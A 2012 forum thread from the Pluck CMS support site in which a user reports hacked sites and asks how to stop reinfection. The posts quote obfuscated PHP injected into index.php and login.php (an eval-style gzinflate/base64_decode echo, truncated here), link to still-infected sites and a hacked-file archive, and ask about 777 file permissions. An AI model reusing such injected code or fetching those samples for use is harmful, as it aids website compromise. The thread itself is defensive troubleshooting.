pluck 4.7 out now, download it today!
pluck support forums
for all your questions about the easiest CMS on the planet
You are not logged in.
- Topics: Active | Unanswered
Announcement
New registrations are disabled for some spam problems. New registrations will be avaliable soon. If you want to help to keep forum away from spam - contact us.
Please post your bug reports on Launchpad.
Please post your bug reports on Launchpad.
Pages: 1
#1 14-03-2012 13:12:13
- topcat2005
- Member
- Registered: 08-06-2011
- Posts: 20
Pluck sites getting hacked
eight pluck websites are hacked.
it is by pluck 4.6 and 4.7
in the index.php they put the follow script:
#1b841a#
echo(gzinflate(base64_decode("3VZLb5tAEP4rrS9ALBN2YXmIbC+tKvXcU2X5gAzEIAdsII1iK/+9Ozu7GDuxTaIeqko2gmFmvnl9w961y6bYdF9S/i3psjjlVfb0KTWtuMjN1L7Puu+P6/WvLGlMi3PqEGqt+GyTNG32o............8=")));
#/1b841a#
in the login.php they put the follow similar script:
#1b841a#
echo(gzinflate(base64_decode("3VZLb5tAEP4rrS9ALBN2YXmIbC+tKvXcU2X5gAzEIAdsII1iK/+9Ozu7GDuxTaIeqko2gmFmvnl9w961y6bYdF............MrRXf3aqj7h8=")));
#/1b841a#
how to prevent this?
some site are now hacked for the second or third time.
Last edited by topcat2005 (14-03-2012 13:12:30)
Offline
#2 14-03-2012 21:36:32
- Spirit55555
- developer
- From: Denmark
- Registered: 09-11-2008
- Posts: 227
- Website
Re: Pluck sites getting hacked
First of all, 4.6 is NOT supported anymore. But 4.7 is.
Could you post some links to the sites that are affected by this? It's really hard to fix otherwise.
Offline
#3 14-03-2012 23:16:26
- topcat2005
- Member
- Registered: 08-06-2011
- Posts: 20
Re: Pluck sites getting hacked
This two sites i have removed the script
http://www.dozybv.nl
http://www.ledssafety.nl
This two sites is with the script
http://www.pannenlegger-tromp.nl
http://www.fight4fit.nl
they are all 4.7
Offline
#4 28-03-2012 08:44:00
- topcat2005
- Member
- Registered: 08-06-2011
- Posts: 20
Re: Pluck sites getting hacked
http://www.dozybv.nl/index.rar This is a hacked index.php from dozybv.nl perhaps you have something whit this.
Offline
#5 30-03-2012 05:31:03
- topcat2005
- Member
- Registered: 08-06-2011
- Posts: 20
Re: Pluck sites getting hacked
In the albums module 1.xx.jpg.php, xx.jpg and the thumb folder have the file permissions 777 (owner group and public can read, write and execute)
is this a default and is this right?
Offline
#6 02-04-2012 12:05:52
- a_bach
- developer/module guru
- From: Poland
- Registered: 24-11-2008
- Posts: 439
- Website
Re: Pluck sites getting hacked
topcat2005 wrote:
http://www.dozybv.nl/index.rar This is a hacked index.php from dozybv.nl perhaps you have something whit this.
The simplest way is to protect (chmod) index.php for read only.
Offline
#7 08-04-2012 16:39:01
- topcat2005
- Member
- Registered: 08-06-2011
- Posts: 20
Re: Pluck sites getting hacked
till now no more mallware on the site
Offline
Pages: 1